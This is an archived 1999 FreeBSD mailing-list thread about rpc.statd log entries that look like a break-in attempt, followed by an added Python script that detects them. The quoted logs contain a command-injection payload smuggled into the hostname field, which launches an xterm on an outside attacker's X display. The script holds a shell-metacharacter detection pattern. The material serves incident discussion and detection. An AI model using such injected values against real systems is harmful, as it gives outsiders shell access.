From owner-freebsd-hackers Sat Feb 20 22: 5:53 1999
Delivered-To: freebsd-hackers@freebsd.org
Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182])
    by hub.freebsd.org (Postfix) with ESMTP id D038A11B4A;
    Sat, 20 Feb 1999 22:05:25 -0800 (PST)
    (envelope-from nick@feralmonkey.org)
Received: from shibumi (shibumi [203.41.114.182])
    by shibumi.feralmonkey.org (Postfix) with ESMTP id 15EA5780B;
    Sat, 21 Feb 1998 17:10:35 +1100 (EST)
Date: Sat, 21 Feb 1998 17:10:34 +1100 (EST)
From:
To: Greg Lehey
Cc: FreeBSD Hackers , FreeBSD-isp@freebsd.org
Subject: Re: New breakin technique?
In-Reply-To: <19990221141243.G93492@lemis.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

There have been issues with statd on both Solaris and Linux. It may
simply be someone running a mass-scan.

Nick

On Sun, 21 Feb 1999, Greg Lehey wrote:

> I've just found the following messages in my logs:
>
> Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
> Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
> Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;
>
> Has anybody seen something like this? It looks as if somebody is
> trying to break in, but I didn't know that rpc.statd could start
> xterms.
>
> Under these circumstances, it would be interesting to know if
> rpc.statd *must* run as root. Wouldn't, say, bin be enough?
>
> Greg
> --
> See complete headers for address, home page and phone numbers
> finger grog@lemis.com for PGP public key
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-hackers" in the body of the message
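
Detection logic for the log pattern quoted in the message above, added here as an example and not part of the original thread: it flags rpc.statd "Invalid hostname to sm_mon" entries whose rejected name contains shell metacharacters and groups the hits by the X display address they name. The function names, the metacharacter set and the fourth (benign) sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# First three lines are the syslog entries quoted in the thread;
# the fourth is a constructed benign control (an assumption, not from the thread).
SAMPLE_LOG = """\
Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;
Feb 21 13:50:02 freebie rpc.statd: Invalid hostname to sm_mon: not_a_host
"""

# Classic syslog prefix, optional [pid], then the statd rejection message.
STATD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\srpc\.statd(?:\[\d+\])?:\s"
    r"Invalid hostname to sm_mon:\s?(?P<name>.*)$")
# Characters with special meaning to a shell (assumed set for this example).
SHELL_META = re.compile(r"[;|&`$<>(){}\\\n]")
# X display target of the form a.b.c.d:N following -display.
DISPLAY_RE = re.compile(r"-display\s+(\d{1,3}(?:\.\d{1,3}){3}):\d+")


def scan(lines):
    """Return findings for rejected sm_mon names that contain shell metacharacters."""
    findings = []
    for line in lines:
        m = STATD_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not an rpc.statd sm_mon rejection
        name = m["name"]
        metas = sorted(set(SHELL_META.findall(name)))
        if not metas:
            continue  # rejected, but nothing shell-like in the name
        d = DISPLAY_RE.search(name)
        findings.append({"ts": m["ts"], "host": m["host"], "name": name,
                         "metachars": metas,
                         "display": d.group(1) if d else None})
    return findings


def by_display(findings):
    """Group finding timestamps by the display address named in the request."""
    grouped = defaultdict(list)
    for f in findings:
        grouped[f["display"]].append(f["ts"])
    return dict(grouped)


if __name__ == "__main__":
    for addr, stamps in by_display(scan(SAMPLE_LOG.splitlines())).items():
        print(addr, len(stamps), "attempt(s):", ", ".join(stamps))
```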